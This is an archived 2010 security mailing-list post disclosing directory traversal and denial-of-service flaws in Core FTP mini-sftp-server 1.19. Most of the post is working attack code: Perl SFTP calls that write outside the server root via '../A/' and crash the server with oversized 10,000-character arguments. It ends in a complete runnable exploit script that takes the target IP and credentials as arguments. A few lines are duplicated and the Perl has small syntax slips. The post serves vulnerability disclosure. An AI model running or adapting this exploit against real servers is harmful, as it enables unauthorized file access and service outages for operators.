lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  PHC 
Open Source and information security mailing list archives
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list]
Date: Mon, 7 Jun 2010 02:35:47 -0600
Subject: Core FTP mini-sftp-server Several DoS and Directory Traversal

Date of Discovery:


Core FTP mini-sftp-server

Core FTP mini-sftp-server version 1.19. 
Earlier versions may also be affected.

"Core FTP Server" and "Core FTP mini-core sftp server" are both products of Core FTP that allow you to exchange files with others via networks and the internet. I have tested the SFTP module of "Core FTP Server" before and found there are several Denial of Service and Directory Traversal vulnerabilities. It seems "Core FTP mini-core sftp server" has behaved the same way as Core FTP Server does--They have the same vulnerabilities.

1.	Directory Traversal vulnerability:
	$m = $sftp->mkdir("../A/");# create a folder outside the root directory

2.	Denial of Service vulnerability:
	$o1 = $sftp->open("A" x 10000);
	$o2 = $sftp->open("test", "O_RDWR", "A" x 10000);
	$o3 = $sftp->open("test", $FUZZ, 0666);	$o3 = $sftp->open("test", $FUZZ, 0666);
	$st = $sftp->stat("A" x 10000);

PS: thanks to Jeremy Brown, I learned a lot from his blog.^_^

Exploit example:

#thanks to Jeremy Brown, I learned a lot from his blog.^_^
#the script will first make a folder "A" outside the root directory and then crash the server.

use Net::SSH2;
use Getopt::Std;

$FUZZ = "A" x 10000; 

getopts('S:P:u:p:', \%opts);
$server = $opts{'S'}; $port = $opts{'P'}; $user = $opts{'u'}; $pass = $opts{'p'};

if(!defined($server) || !defined($port) || !defined($user) || !defined($pass) )
	print "usage:\n\tperl -S [IP] -P [port] -u [user] -p [password]\nexample:\n";
	print "\tperl -S -P 22 -u chloe -p 111111\n";

$ssh2 = Net::SSH2->new();
$ssh2->connect($server, $port) || die "can not connect the server, please check.\n";
$ssh2->auth_password($user, $pass) || die "you sure user name and password are correct?\n";
$sftp = $ssh2->sftp();

#make a folder outside the root directory
$m = $sftp->mkdir("../A/");

#any command of the following would cause Core FTP mini-sftp-server crash.
$o1 = $sftp->open($FUZZ);
#$o2 = $sftp->open("test", "O_RDWR", $FUZZ);
#$o3 = $sftp->open("test", $FUZZ, 0666);$o3 = $sftp->open("test", $FUZZ, 0666);
#$st = $sftp->stat($FUZZ);


Powered by blists - more mailing lists